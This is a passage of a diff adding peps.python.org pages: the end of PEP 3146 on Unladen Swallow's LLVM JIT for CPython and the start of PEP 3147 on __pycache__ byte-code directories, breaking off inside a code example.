That turned out to be incorrect. We had to turn our attention away from +performance to fix a number of critical bugs in LLVM’s JIT infrastructure (for +example, [84], [85]) as well as a number of +nice-to-have enhancements that would enable further optimizations along various +axes (for example, [87], +[86], [88]). LLVM’s static code generation +facilities, tools and optimization passes are stable and stress-tested, but the +just-in-time infrastructure was relatively untested and buggy. We have fixed +this.

+

(Our hypothesis is that we hit these problems – problems other projects had +avoided – because of the complexity and thoroughness of CPython’s standard +library test suite.)

+

We also diverted engineering effort away from performance and into support tools +such as gdb and oProfile. gdb did not work well with JIT compilers at all, and +LLVM previously had no integration with oProfile. Having JIT-aware debuggers and +profilers has been very valuable to the project, and we do not regret +channeling our time in these directions. See the Debugging and Profiling +sections for more information.

+

Can an LLVM-based CPython JIT ever hit the 5x performance target? The benchmark +results for JIT-based JavaScript implementations suggest that 5x is indeed +possible, as do the results PyPy’s JIT has delivered for numeric workloads. The +experience of Self-92 [52] is also instructive.

+

Can LLVM deliver this? We believe that we have only begun to scratch the surface +of what our LLVM-based JIT can deliver. The optimizations we have incorporated +into this system thus far have borne significant fruit (for example, +[89], [90], +[91]). Our experience to date is that the limiting factor +on Unladen Swallow’s performance is the engineering cycles needed to implement +the literature. We have found LLVM easy to work with and to modify, and its +built-in optimizations have greatly simplified the task of implementing +Python-level optimizations.

+

An overview of further performance opportunities is discussed in the +Future Work section.

+
+
+
+

Correctness and Compatibility

+

Unladen Swallow’s correctness test suite includes CPython’s test suite (under +Lib/test/), as well as a number of important third-party applications and +libraries [6]. A full list of these applications and libraries is +reproduced below. Any dependencies needed by these packages, such as +zope.interface [34], are also tested indirectly as a part of +testing the primary package, thus widening the corpus of tested third-party +Python code.

+
    +
• 2to3
• Cheetah
• cvs2svn
• Django
• Nose
• NumPy
• PyCrypto
• pyOpenSSL
• PyXML
• Setuptools
• SQLAlchemy
• SWIG
• SymPy
• Twisted
• ZODB
+

These applications pass all relevant tests when run under Unladen Swallow. Note +that some tests that failed against our baseline of CPython 2.6.4 were disabled, +as were tests that made assumptions about CPython internals such as exact +bytecode numbers or bytecode format. Any package with disabled tests includes +a README.unladen file that details the changes (for example, +[37]).

+

In addition, Unladen Swallow is tested automatically against an array of +internal Google Python libraries and applications. These include Google’s +internal Python bindings for BigTable [35], the Mondrian code review +application [36], and Google’s Python standard library, among others. +The changes needed to run these projects under Unladen Swallow have consistently +broken into one of three camps:

+
    +
• Adding CPython 2.6 C API compatibility. Since Google still primarily uses CPython 2.4 internally, we have needed to convert uses of int to Py_ssize_t and make similar API changes.
• Fixing or disabling explicit, incorrect tests of the CPython version number.
• Conditionally disabling code that worked around or depended on bugs in CPython 2.4 that have since been fixed.
+

Testing against this wide range of public and proprietary applications and +libraries has been instrumental in ensuring the correctness of Unladen Swallow. +Testing has exposed bugs that we have duly corrected. Our automated regression +testing regime has given us high confidence in our changes as we have moved +forward.

+

In addition to third-party testing, we have added further tests to CPython’s +test suite for corner cases of the language or implementation that we felt were +untested or underspecified (for example, [48], +[49]). These have been especially important when implementing +optimizations, helping make sure we have not accidentally broken the darker +corners of Python.

+

We have also constructed a test suite focused solely on the LLVM-based JIT +compiler and the optimizations implemented for it [38]. Because of +the complexity and subtlety inherent in writing an optimizing compiler, we have +attempted to exhaustively enumerate the constructs, scenarios and corner cases +we are compiling and optimizing. The JIT tests also include tests for things +like the JIT hotness model, making it easier for future CPython developers to +maintain and improve.

+

We have recently begun using fuzz testing [39] to stress-test the +compiler. We have used both pyfuzz [40] and Fusil [41] in the past, +and we recommend they be introduced as an automated part of the CPython testing +process.

+
+

Known Incompatibilities

+

The only application or library known not to work with Unladen Swallow that does work with CPython 2.6.4 is Psyco [65]. We are aware of some libraries such as PyGame [79] that work well with CPython 2.6.4, but suffer some degradation due to changes made in Unladen Swallow. We are tracking this issue [47] and are working to resolve these instances of degradation.

+

While Unladen Swallow is source-compatible with CPython 2.6.4, it is not +binary compatible. C extension modules compiled against one will need to be +recompiled to work with the other.

+

The merger of Unladen Swallow should have minimal impact on long-lived +CPython optimization branches like WPython. WPython [105] and Unladen +Swallow are largely orthogonal, and there is no technical reason why both +could not be merged into CPython. The changes needed to make WPython +compatible with a JIT-enhanced version of CPython should be minimal +[114]. The same should be true for other CPython optimization +projects (for example, [115]).

+

Invasive forks of CPython such as Stackless Python [116] are more +challenging to support. Since Stackless is highly unlikely to be merged into +CPython [117] and an increased maintenance burden is part and +parcel of any fork, we consider compatibility with Stackless to be relatively +low-priority. JIT-compiled stack frames use the C stack, so Stackless should +be able to treat them the same as it treats calls through extension modules. +If that turns out to be unacceptable, Stackless could either remove the JIT +compiler or improve JIT code generation to better support heap-based stack +frames [118], [119].

+
+
+
+

Platform Support

+

Unladen Swallow is inherently limited by the platform support provided by LLVM, +especially LLVM’s JIT compilation system [7]. LLVM’s JIT has the +best support on x86 and x86-64 systems, and these are the platforms where +Unladen Swallow has received the most testing. We are confident in LLVM/Unladen +Swallow’s support for x86 and x86-64 hardware. PPC and ARM support exists, but +is not widely used and may be buggy (for example, [100], +[84], [101]).

+

Unladen Swallow is known to work on the following operating systems: Linux, +Darwin, Windows. Unladen Swallow has received the most testing on Linux and +Darwin, though it still builds and passes its tests on Windows.

+

In order to support hardware and software platforms where LLVM’s JIT does not +work, Unladen Swallow provides a ./configure --without-llvm option. This +flag carves out any part of Unladen Swallow that depends on LLVM, yielding a +Python binary that works and passes its tests, but has no performance +advantages. This configuration is recommended for hardware unsupported by LLVM, +or systems that care more about memory usage than performance.

+
+
+

Impact on CPython Development

+
+

Experimenting with Changes to Python or CPython Bytecode

+

Unladen Swallow’s JIT compiler operates on CPython bytecode, and as such, it is +immune to Python language changes that affect only the parser.

+

We recommend that changes to the CPython bytecode compiler or the semantics of +individual bytecodes be prototyped in the interpreter loop first, then be ported +to the JIT compiler once the semantics are clear. To make this easier, Unladen +Swallow includes a --without-llvm configure-time option that strips out the +JIT compiler and all associated infrastructure. This leaves the current burden +of experimentation unchanged so that developers can prototype in the current +low-barrier-to-entry interpreter loop.

+

Unladen Swallow began implementing its JIT compiler by doing straightforward, +naive translations from bytecode implementations into LLVM API calls. We found +this process to be easily understood, and we recommend the same approach for +CPython. We include several sample changes from the Unladen Swallow repository +here as examples of this style of development: [26], [27], +[28], [29].

+
+
+

Debugging

+

The Unladen Swallow team implemented changes to gdb to make it easier to use gdb +to debug JIT-compiled Python code. These changes were released in gdb 7.0 +[17]. They make it possible for gdb to identify and unwind past +JIT-generated call stack frames. This allows gdb to continue to function as +before for CPython development if one is changing, for example, the list +type or builtin functions.

+

Example backtrace after our changes, where baz, bar and foo are +JIT-compiled:

+
Program received signal SIGSEGV, Segmentation fault.
+0x00002aaaabe7d1a8 in baz ()
+(gdb) bt
+#0 0x00002aaaabe7d1a8 in baz ()
+#1 0x00002aaaabe7d12c in bar ()
+#2 0x00002aaaabe7d0aa in foo ()
+#3 0x00002aaaabe7d02c in main ()
+#4 0x0000000000b870a2 in llvm::JIT::runFunction (this=0x1405b70, F=0x14024e0, ArgValues=...)
+at /home/rnk/llvm-gdb/lib/ExecutionEngine/JIT/JIT.cpp:395
+#5 0x0000000000baa4c5 in llvm::ExecutionEngine::runFunctionAsMain
+(this=0x1405b70, Fn=0x14024e0, argv=..., envp=0x7fffffffe3c0)
+at /home/rnk/llvm-gdb/lib/ExecutionEngine/ExecutionEngine.cpp:377
+#6 0x00000000007ebd52 in main (argc=2, argv=0x7fffffffe3a8,
+envp=0x7fffffffe3c0) at /home/rnk/llvm-gdb/tools/lli/lli.cpp:208
+
+
+

Previously, the JIT-compiled frames would have caused gdb to unwind incorrectly, +generating lots of obviously-incorrect #6 0x00002aaaabe7d0aa in ?? ()-style +stack frames.

+

Highlights:

+
    +
• gdb 7.0 is able to correctly parse JIT-compiled stack frames, allowing full use of gdb on non-JIT-compiled functions, that is, the vast majority of the CPython codebase.
• Disassembling inside a JIT-compiled stack frame automatically prints the full list of instructions making up that function. This is an advance over the state of gdb before our work: developers needed to guess the starting address of the function and manually disassemble the assembly code.
• A flexible underlying mechanism allows CPython to add more and more information, and eventually reach parity with C/C++ support in gdb for JIT-compiled machine code.
+

Lowlights:

+
    +
• gdb cannot print local variables or tell you what line you’re currently executing inside a JIT-compiled function. Nor can it step through JIT-compiled code, except for one instruction at a time.
• Not yet integrated with Apple’s gdb or Microsoft’s Visual Studio debuggers.
+

The Unladen Swallow team is working with Apple to get these changes +incorporated into their future gdb releases.

+
+
+

Profiling

+

Unladen Swallow integrates with oProfile 0.9.4 and newer [18] to support +assembly-level profiling on Linux systems. This means that oProfile will +correctly symbolize JIT-compiled functions in its reports.

+

Example report, where the #u#-prefixed symbol names are JIT-compiled Python +functions:

+
$ opreport -l ./python | less
+CPU: Core 2, speed 1600 MHz (estimated)
+Counted CPU_CLK_UNHALTED events (Clock cycles when not halted) with a unit mask of 0x00 (Unhalted core cycles) count 100000
+samples % image name symbol name
+79589 4.2329 python PyString_FromFormatV
+62971 3.3491 python PyEval_EvalCodeEx
+62713 3.3354 python tupledealloc
+57071 3.0353 python _PyEval_CallFunction
+50009 2.6597 24532.jo #u#force_unicode
+47468 2.5246 python PyUnicodeUCS2_Decode
+45829 2.4374 python PyFrame_New
+45173 2.4025 python lookdict_string
+43082 2.2913 python PyType_IsSubtype
+39763 2.1148 24532.jo #u#render5
+38145 2.0287 python _PyType_Lookup
+37643 2.0020 python PyObject_GC_UnTrack
+37105 1.9734 python frame_dealloc
+36849 1.9598 python PyEval_EvalFrame
+35630 1.8950 24532.jo #u#resolve
+33313 1.7717 python PyObject_IsInstance
+33208 1.7662 python PyDict_GetItem
+33168 1.7640 python PyTuple_New
+30458 1.6199 python PyCFunction_NewEx
+
+
+

This support is functional, but as-yet unpolished. Unladen Swallow maintains a +punchlist of items we feel are important to improve in our oProfile integration +to make it more useful to core CPython developers [19].

+

Highlights:

+
    +
• Symbolization of JITted frames working in oProfile on Linux.
+

Lowlights:

+
    +
• No work yet invested in improving symbolization of JIT-compiled frames for Apple’s Shark [20] or Microsoft’s Visual Studio profiling tools.
• Some polishing still desired for oProfile output.
+

We recommend using oProfile 0.9.5 (and newer) to work around a now-fixed bug on +x86-64 platforms in oProfile. oProfile 0.9.4 will work fine on 32-bit platforms, +however.

+

Given the ease of integrating oProfile with LLVM [21] and +Unladen Swallow [22], other profiling tools should be easy as +well, provided they support a similar JIT interface [23].

+

We have documented the process for using oProfile to profile Unladen Swallow [24]. This document will be merged into CPython’s Doc/ tree as part of the merge.

+
+
+

Addition of C++ to CPython

+

In order to use LLVM, Unladen Swallow has introduced C++ into the core CPython +tree and build process. This is an unavoidable part of depending on LLVM; though +LLVM offers a C API [8], it is limited and does not expose the +functionality needed by CPython. Because of this, we have implemented the +internal details of the Unladen Swallow JIT and its supporting infrastructure +in C++. We do not propose converting the entire CPython codebase to C++.

+

Highlights:

+
    +
• Easy use of LLVM’s full, powerful code generation and related APIs.
• Convenient, abstract data structures simplify code.
• C++ is limited to relatively small corners of the CPython codebase.
• C++ can be disabled via ./configure --without-llvm, which even omits the dependency on libstdc++.
+

Lowlights:

+
    +
• Developers must know two related languages, C and C++, to work on the full range of CPython’s internals.
• A C++ style guide will need to be developed and enforced. PEP 7 will be extended [120] to encompass C++ by taking the relevant parts of the C++ style guides from Unladen Swallow [70], LLVM [71] and Google [72].
• Different C++ compilers emit different ABIs; this can cause problems if CPython is compiled with one C++ compiler and extension modules are compiled with a different C++ compiler.
+
+
+

Managing LLVM Releases, C++ API Changes

+

LLVM is released regularly every six months. This means that LLVM may be +released two or three times during the course of development of a CPython 3.x +release. Each LLVM release brings newer and more powerful optimizations, +improved platform support and more sophisticated code generation.

+

LLVM releases usually include incompatible changes to the LLVM C++ API; the +release notes for LLVM 2.6 [9] include a list of +intentionally-introduced incompatibilities. Unladen Swallow has tracked LLVM +trunk closely over the course of development. Our experience has been +that LLVM API changes are obvious and easily or mechanically remedied. We +include two such changes from the Unladen Swallow tree as references here: +[10], [11].

+

Due to API incompatibilities, we recommend that an LLVM-based CPython target +compatibility with a single version of LLVM at a time. This will lower the +overhead on the core development team. Pegging to an LLVM version should not be +a problem from a packaging perspective, because pre-built LLVM packages +generally become available via standard system package managers fairly quickly +following an LLVM release, and failing that, llvm.org itself includes binary +releases.

+

Unladen Swallow has historically included a copy of the LLVM and Clang source +trees in the Unladen Swallow tree; this was done to allow us to closely track +LLVM trunk as we made patches to it. We do not recommend this model of +development for CPython. CPython releases should be based on official LLVM +releases. Pre-built LLVM packages are available from MacPorts [12] +for Darwin, and from most major Linux distributions ([13], +[14], [16]). LLVM itself provides additional binaries, +such as for MinGW [25].

+

LLVM is currently intended to be statically linked; this means that binary +releases of CPython will include the relevant parts (not all!) of LLVM. This +will increase the binary size, as noted above. To simplify downstream package +management, we will modify LLVM to better support shared linking. This issue +will block final merger [98].

+

Unladen Swallow has tasked a full-time engineer with fixing any remaining +critical issues in LLVM before LLVM’s 2.7 release. We consider it essential that +CPython 3.x be able to depend on a released version of LLVM, rather than closely +tracking LLVM trunk as Unladen Swallow has done. We believe we will finish this +work [99] before the release of LLVM 2.7, expected in May 2010.

+
+
+

Building CPython

+

In addition to a runtime dependency on LLVM, Unladen Swallow includes a +build-time dependency on Clang [5], an LLVM-based C/C++ compiler. We use +this to compile parts of the C-language Python runtime to LLVM’s intermediate +representation; this allows us to perform cross-language inlining, yielding +increased performance. Clang is not required to run Unladen Swallow. Clang +binary packages are available from most major Linux distributions (for example, +[15]).

+

We examined the impact of Unladen Swallow on the time needed to build Python, +including configure, full builds and incremental builds after touching a single +C source file.

./configure  CPython 2.6.4  CPython 3.1.1  Unladen Swallow r988
Run 1        0m20.795s      0m16.558s      0m15.477s
Run 2        0m15.255s      0m16.349s      0m15.391s
Run 3        0m15.228s      0m16.299s      0m15.528s

Full make    CPython 2.6.4  CPython 3.1.1  Unladen Swallow r988
Run 1        1m30.776s      1m22.367s      1m54.053s
Run 2        1m21.374s      1m22.064s      1m49.448s
Run 3        1m22.047s      1m23.645s      1m49.305s
+

Full builds take a hit due to a) additional .cc files needed for LLVM +interaction, b) statically linking LLVM into libpython, c) compiling parts +of the Python runtime to LLVM IR to enable cross-language inlining.

+

Incremental builds are also somewhat slower than mainline CPython. The table +below shows incremental rebuild times after touching Objects/listobject.c.

Incr make  CPython 2.6.4  CPython 3.1.1  Unladen Swallow r1024
Run 1      0m1.854s       0m1.456s       0m6.680s
Run 2      0m1.437s       0m1.442s       0m5.310s
Run 3      0m1.440s       0m1.425s       0m7.639s
+

As with full builds, this extra time comes from statically linking LLVM +into libpython. If libpython were linked shared against LLVM, this +overhead would go down.

+
+
+
+

Proposed Merge Plan

+

We propose focusing our efforts on eventual merger with CPython’s 3.x line of +development. The BDFL has indicated that 2.7 is to be the final release of +CPython’s 2.x line of development [30], and since 2.7 alpha 1 has +already been released, we have missed the window. Python 3 is the +future, and that is where we will target our performance efforts.

+

We recommend the following plan for merger of Unladen Swallow into the CPython +source tree:

+
    +
• Creation of a branch in the CPython SVN repository to work in, call it py3k-jit as a strawman. This will be a branch of the CPython py3k branch.
• We will keep this branch closely integrated with py3k. The further we deviate, the harder our work will be.
• Any JIT-related patches will go into the py3k-jit branch.
• Non-JIT-related patches will go into the py3k branch (once reviewed and approved) and be merged back into the py3k-jit branch.
• Potentially-contentious issues, such as the introduction of new command line flags or environment variables, will be discussed on python-dev.
+

Because Google uses CPython 2.x internally, Unladen Swallow is based on CPython +2.6. We would need to port our compiler to Python 3; this would be done as +patches are applied to the py3k-jit branch, so that the branch remains a +consistent implementation of Python 3 at all times.

+

We believe this approach will be minimally disruptive to the 3.2 or 3.3 release +process while we iron out any remaining issues blocking final merger into +py3k. Unladen Swallow maintains a punchlist of known issues needed before +final merger [31], which includes all problems mentioned in this +PEP; we trust the CPython community will have its own concerns. This punchlist +is not static; other issues may emerge in the future that will block final +merger into the py3k branch.

+

Changes will be committed directly to the py3k-jit branch, with only large, +tricky or controversial changes sent for pre-commit code review.

+
+

Contingency Plans

+

There is a chance that we will not be able to reduce memory usage or startup +time to a level satisfactory to the CPython community. Our primary contingency +plan for this situation is to shift from an online just-in-time compilation +strategy to an offline ahead-of-time strategy using an instrumented CPython +interpreter loop to obtain feedback. This is the same model used by gcc’s +feedback-directed optimizations (-fprofile-generate) [112] and +Microsoft Visual Studio’s profile-guided optimizations [113]; we will +refer to this as “feedback-directed optimization” here, or FDO.

+

We believe that an FDO compiler for Python would be inferior to a JIT compiler. +FDO requires a high-quality, representative benchmark suite, which is a relative +rarity in both open- and closed-source development. A JIT compiler can +dynamically find and optimize the hot spots in any application – benchmark +suite or no – allowing it to adapt to changes in application bottlenecks +without human intervention.

+

If an ahead-of-time FDO compiler is required, it should be able to leverage a +large percentage of the code and infrastructure already developed for Unladen +Swallow’s JIT compiler. Indeed, these two compilation strategies could exist +side by side.

+
+
+
+

Future Work

+

A JIT compiler is an extremely flexible tool, and we have by no means exhausted +its full potential. Unladen Swallow maintains a list of yet-to-be-implemented +performance optimizations [50] that the team has not yet +had time to fully implement. Examples:

+
    +
• Python/Python inlining [67]. Our compiler currently performs no inlining between pure-Python functions. Work on this is ongoing [69].
• Unboxing [68]. Unboxing is critical for numerical performance. PyPy in particular has demonstrated the value of unboxing to heavily numeric workloads.
• Recompilation, adaptation. Unladen Swallow currently only compiles a Python function once, based on its usage pattern up to that point. If the usage pattern changes, limitations in LLVM [73] prevent us from recompiling the function to better serve the new usage pattern.
• JIT-compile regular expressions. Modern JavaScript engines reuse their JIT compilation infrastructure to boost regex performance [74]. Unladen Swallow has developed benchmarks for Python regular expression performance ([75], [76], [77]), but work on regex performance is still at an early stage [78].
• Trace compilation [92], [93]. Based on the results of PyPy and TraceMonkey [94], we believe that a CPython JIT should incorporate trace compilation to some degree. We initially avoided a purely-tracing JIT compiler in favor of a simpler, function-at-a-time compiler. However, this function-at-a-time compiler has laid the groundwork for a future tracing compiler implemented in the same terms.
• Profile generation/reuse. The runtime data gathered by the JIT could be persisted to disk and reused by subsequent JIT compilations, or by external tools such as Cython [102] or a feedback-enhanced code coverage tool.
+

This list is by no means exhaustive. There is a vast literature on optimizations +for dynamic languages that could and should be implemented in terms of Unladen +Swallow’s LLVM-based JIT compiler [54].

+
+
+

Unladen Swallow Community

+

We would like to thank the community of developers who have contributed to +Unladen Swallow, in particular: James Abbatiello, Joerg Blank, Eric Christopher, +Alex Gaynor, Chris Lattner, Nick Lewycky, Evan Phoenix and Thomas Wouters.

+
+
+

Licensing

+

All work on Unladen Swallow is licensed to the Python Software Foundation (PSF) +under the terms of the Python Software Foundation License v2 [56] under +the umbrella of Google’s blanket Contributor License Agreement with the PSF.

+

LLVM is licensed [57] under the University of Illinois/NCSA Open Source License [58], a liberal, OSI-approved license. The University of Illinois Urbana-Champaign is the sole copyright holder for LLVM.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3146.rst

+

Last modified: 2023-09-09 17:39:29 GMT

\ No newline at end of file
diff --git a/pep-3147/index.html b/pep-3147/index.html
new file mode 100644
index 00000000000..618d91540ff
--- /dev/null
+++ b/pep-3147/index.html
@@ -0,0 +1,763 @@
+PEP 3147 – PYC Repository Directories | peps.python.org
+
+

+
+
+

PEP 3147 – PYC Repository Directories

Author: Barry Warsaw <barry at python.org>
Status: Final
Type: Standards Track
Created: 16-Dec-2009
Python-Version: 3.2
Post-History: 30-Jan-2010, 25-Feb-2010, 03-Mar-2010, 12-Apr-2010
Resolution: Python-Dev message
+

Abstract

+

This PEP describes an extension to Python’s import mechanism which +improves sharing of Python source code files among multiple installed +different versions of the Python interpreter. It does this by +allowing more than one byte compilation file (.pyc files) to be +co-located with the Python source file (.py file). The extension +described here can also be used to support different Python +compilation caches, such as JIT output that may be produced by an +Unladen Swallow (PEP 3146) enabled C Python.

+
+
+

Background

+

CPython compiles its source code into “byte code”, and for performance reasons, it caches this byte code on the file system whenever the source file has changed. This makes loading of Python modules much faster because the compilation phase can be bypassed. When your source file is foo.py, CPython caches the byte code in a foo.pyc file right next to the source.

+

Byte code files contain two 32-bit little-endian numbers followed by the marshaled [2] code object. The 32-bit numbers represent a magic number and a timestamp. The magic number changes whenever Python changes the byte code format, e.g. by adding new byte codes to its virtual machine. This ensures that pyc files built for previous versions of the VM won’t cause problems. The timestamp is used to make sure that the pyc file matches the py file that was used to create it. When either the magic number or timestamp do not match, the py file is recompiled and a new pyc file is written.
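
A minimal sketch of reading that header with stock Python (the imp module was current when this PEP was written; later CPython releases added fields to the header and moved this functionality into importlib):

import imp
import struct

def check_pyc(path):
    # pyc header at the time of this PEP: 4-byte magic, 4-byte timestamp.
    with open(path, 'rb') as f:
        magic = f.read(4)
        timestamp = struct.unpack('<I', f.read(4))[0]
    # A "matching" pyc carries the current interpreter's magic number.
    return magic == imp.get_magic(), timestamp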

+

In practice, it is well known that pyc files are not compatible across +Python major releases. A reading of import.c [3] in the Python +source code proves that within recent memory, every new CPython major +release has bumped the pyc magic number.

+
+
+

Rationale

+

Linux distributions such as Ubuntu [4] and Debian [5] provide more +than one Python version at the same time to their users. For example, +Ubuntu 9.10 Karmic Koala users can install Python 2.5, 2.6, and 3.1, +with Python 2.6 being the default.

+

This causes a conflict for third party Python source files installed by the system, because you cannot compile a single Python source file for more than one Python version at a time. When Python finds a pyc file with a non-matching magic number, it falls back to the slower process of recompiling the source. Thus if your system installed a /usr/share/python/foo.py, two different versions of Python would fight over the pyc file and rewrite it each time the source is compiled. (The standard library is unaffected by this, since multiple versions of the stdlib are installed on such distributions.)

+

Furthermore, in order to ease the burden on operating system packagers +for these distributions, the distribution packages do not contain +Python version numbers [6]; they are shared across all Python +versions installed on the system. Putting Python version numbers in +the packages would be a maintenance nightmare, since all the packages +- and their dependencies - would have to be updated every time a new +Python release was added or removed from the distribution. Because of +the sheer number of packages available, this amount of work is +infeasible.

+

(PEP 384 has been proposed to address binary compatibility issues +of third party extension modules across different versions of Python.)

+

Because these distributions cannot share pyc files, elaborate +mechanisms have been developed to put the resulting pyc files in +non-shared locations while the source code is still shared. Examples +include the symlink-based Debian regimes python-support [8] and +python-central [9]. These approaches make for much more complicated, +fragile, inscrutable, and fragmented policies for delivering Python +applications to a wide range of users. Arguably more users get Python +from their operating system vendor than from upstream tarballs. Thus, +solving this pyc sharing problem for CPython is a high priority for +such vendors.

+

This PEP proposes a solution to this problem.

+
+
+

Proposal

+

Python’s import machinery is extended to write and search for byte +code cache files in a single directory inside every Python package +directory. This directory will be called __pycache__.

+

Further, pyc file names will contain a magic string (called a “tag”) +that differentiates the Python version they were compiled for. This +allows multiple byte compiled cache files to co-exist for a single +Python source file.

+

The magic tag is implementation defined, but should contain the +implementation name and a version number shorthand, e.g. cpython-32. +It must be unique among all versions of Python, and whenever the magic +number is bumped, a new magic tag must be defined. An example pyc +file for Python 3.2 is thus foo.cpython-32.pyc.

+

The magic tag is available in the imp module via the get_tag() +function. This is parallel to the imp.get_magic() function.
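
For example (imp.get_tag() is the API this PEP specifies; on modern CPython the equivalent functionality lives in importlib.util, e.g. cache_from_source()):

import imp

tag = imp.get_tag()        # e.g. 'cpython-32'
source = 'foo.py'
cached = '__pycache__/%s.%s.pyc' % (source[:-3], tag)
# cached == '__pycache__/foo.cpython-32.pyc' on CPython 3.2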

+

This scheme has the added benefit of reducing the clutter in a Python +package directory.

+

When a Python source file is imported for the first time, a +__pycache__ directory will be created in the package directory, if +one does not already exist. The pyc file for the imported source will +be written to the __pycache__ directory, using the magic-tag +formatted name. If either the creation of the __pycache__ directory +or the pyc file inside that fails, the import will still succeed, just +as it does in a pre-PEP 3147 world.

+

If the py source file is missing, the pyc file inside __pycache__ +will be ignored. This eliminates the problem of accidental stale pyc +file imports.

+

For backward compatibility, Python will still support pyc-only distributions; however, it will only do so when the pyc file lives in the directory where the py file would have been, i.e. not in the __pycache__ directory. A pyc file outside of __pycache__ will only be imported if the py source file is missing.

+

Tools such as py_compile [15] and compileall [16] will be +extended to create PEP 3147 formatted layouts automatically, but will +have an option to create pyc-only distribution layouts.
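
For example, with the stdlib tools named above (the exact options for pyc-only layouts grew over subsequent releases, so the cfile approach shown here is one way, not the only way):

import py_compile
import compileall

# Writes the byte code to the PEP 3147 location,
# e.g. __pycache__/foo.cpython-32.pyc
py_compile.compile('foo.py')

# Passing an explicit cfile produces a legacy, pyc-only layout instead.
py_compile.compile('foo.py', cfile='foo.pyc')

# Byte-compile an entire package tree the same way.
compileall.compile_dir('alpha/', quiet=True)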

+
+

Examples

+

What would this look like in practice?

+

Let’s say we have a Python package named alpha which contains a +sub-package name beta. The source directory layout before byte +compilation might look like this:

+
alpha/
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __init__.py
+        three.py
+        four.py
+
+
+

After byte compiling this package with Python 3.2, you would see the +following layout:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        one.cpython-32.pyc
+        two.cpython-32.pyc
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+            __init__.cpython-32.pyc
+            three.cpython-32.pyc
+            four.cpython-32.pyc
+        __init__.py
+        three.py
+        four.py
+
+
+

Note: listing order may differ depending on the platform.

+

Let’s say that two new versions of Python are installed, one is Python +3.3 and another is Unladen Swallow. After byte compilation, the file +system would look like this:

+
alpha/
+    __pycache__/
+        __init__.cpython-32.pyc
+        __init__.cpython-33.pyc
+        __init__.unladen-10.pyc
+        one.cpython-32.pyc
+        one.cpython-33.pyc
+        one.unladen-10.pyc
+        two.cpython-32.pyc
+        two.cpython-33.pyc
+        two.unladen-10.pyc
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+            __init__.cpython-32.pyc
+            __init__.cpython-33.pyc
+            __init__.unladen-10.pyc
+            three.cpython-32.pyc
+            three.cpython-33.pyc
+            three.unladen-10.pyc
+            four.cpython-32.pyc
+            four.cpython-33.pyc
+            four.unladen-10.pyc
+        __init__.py
+        three.py
+        four.py
+
+
+

As you can see, as long as the Python version identifier string is +unique, any number of pyc files can co-exist. These identifier +strings are described in more detail below.

+

A nice property of this layout is that the __pycache__ directories +can generally be ignored, such that a normal directory listing would +show something like this:

+
alpha/
+    __pycache__/
+    __init__.py
+    one.py
+    two.py
+    beta/
+        __pycache__/
+        __init__.py
+        three.py
+        four.py
+
+
+

This is much less cluttered than even today’s Python.

+
+
+
+

Python behavior

+

When Python searches for a module to import (say foo), it may find +one of several situations. As per current Python rules, the term +“matching pyc” means that the magic number matches the current +interpreter’s magic number, and the source file’s timestamp matches +the timestamp in the pyc file exactly.

+
+

Case 0: The steady state

+

When Python is asked to import module foo, it searches for a +foo.py file (or foo package, but that’s not important for this +discussion) along its sys.path. If found, Python looks to see if +there is a matching __pycache__/foo.<magic>.pyc file, and if so, +that pyc file is loaded.

+
+
+

Case 1: The first import

+

When Python locates the foo.py, if the __pycache__/foo.<magic>.pyc +file is missing, Python will create it, also creating the +__pycache__ directory if necessary. Python will parse and byte +compile the foo.py file and save the byte code in +__pycache__/foo.<magic>.pyc.

+
+
+

Case 2: The second import

+

When Python is asked to import module foo a second time (in a +different process of course), it will again search for the foo.py +file along its sys.path. When Python locates the foo.py file, it +looks for a matching __pycache__/foo.<magic>.pyc and finding this, +it reads the byte code and continues as usual.

+
+
+

Case 3: __pycache__/foo.<magic>.pyc with no source

+

It’s possible that the foo.py file somehow got removed, while +leaving the cached pyc file still on the file system. If the +__pycache__/foo.<magic>.pyc file exists, but the foo.py file used +to create it does not, Python will raise an ImportError when asked +to import foo. In other words, Python will not import a pyc file from +the cache directory unless the source file exists.

+
+
+

Case 4: legacy pyc files and source-less imports

+

Python will ignore all legacy pyc files when a source file exists next to them. In other words, if a foo.pyc file exists next to the foo.py file, the pyc file will be ignored in all cases.

+

In order to continue to support source-less distributions though, if +the source file is missing, Python will import a lone pyc file if it +lives where the source file would have been.

+
+
+

Case 5: read-only file systems

+

When the source lives on a read-only file system, or the __pycache__ directory or pyc file cannot otherwise be written, all the same rules apply. This is also the case when the __pycache__ directory exists but its permissions do not allow the contained pyc files to be written.

+
+
+
+

Flow chart

+

Here is a flow chart describing how modules are loaded:

[Flow chart: ../_images/pep-3147-1.png]
+
+

Alternative Python implementations

+

Alternative Python implementations such as Jython [11], IronPython +[12], PyPy [13], Pynie [14], and Unladen Swallow can also use the +__pycache__ directory to store whatever compilation artifacts make +sense for their platforms. For example, Jython could store the class +file for the module in __pycache__/foo.jython-32.class.

+
+
+

Implementation strategy

+

This feature is targeted for Python 3.2, solving the problem for those +and all future versions. It may be back-ported to Python 2.7. +Vendors are free to backport the changes to earlier distributions as +they see fit. For backports of this feature to Python 2, when the +-U flag is used, a file such as foo.cpython-27u.pyc can be +written.

+
+
+

Effects on existing code

+

Adoption of this PEP will affect existing code and idioms, both inside +Python and outside. This section enumerates some of these effects.

+
+

Detecting PEP 3147 availability

+

The easiest way to detect whether your version of Python provides PEP +3147 functionality is to do the following check:

+
>>> import imp
+>>> has3147 = hasattr(imp, 'get_tag')
+
+
+
+
+

__file__

+

In Python 3, when you import a module, its __file__ attribute points +to its source py file (in Python 2, it points to the pyc file). A +package’s __file__ points to the py file for its __init__.py. +E.g.:

+
>>> import foo
+>>> foo.__file__
+'foo.py'
+# baz is a package
+>>> import baz
+>>> baz.__file__
+'baz/__init__.py'
+
+
+

Nothing in this PEP would change the semantics of __file__.

+

This PEP proposes the addition of an __cached__ attribute to modules, which will always point to the actual pyc file that was read or written. When the environment variable $PYTHONDONTWRITEBYTECODE is set, or the -B option is given, or if the source lives on a read-only filesystem, then the __cached__ attribute will point to the location that the pyc file would have been written to, had writing not been suppressed. This location of course includes the __pycache__ subdirectory in its path.

+
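As a hypothetical illustration of the proposed attribute, using the naming scheme from the examples above (foo is a stand-in module name, not part of the specification):

+
>>> import foo
+>>> foo.__file__
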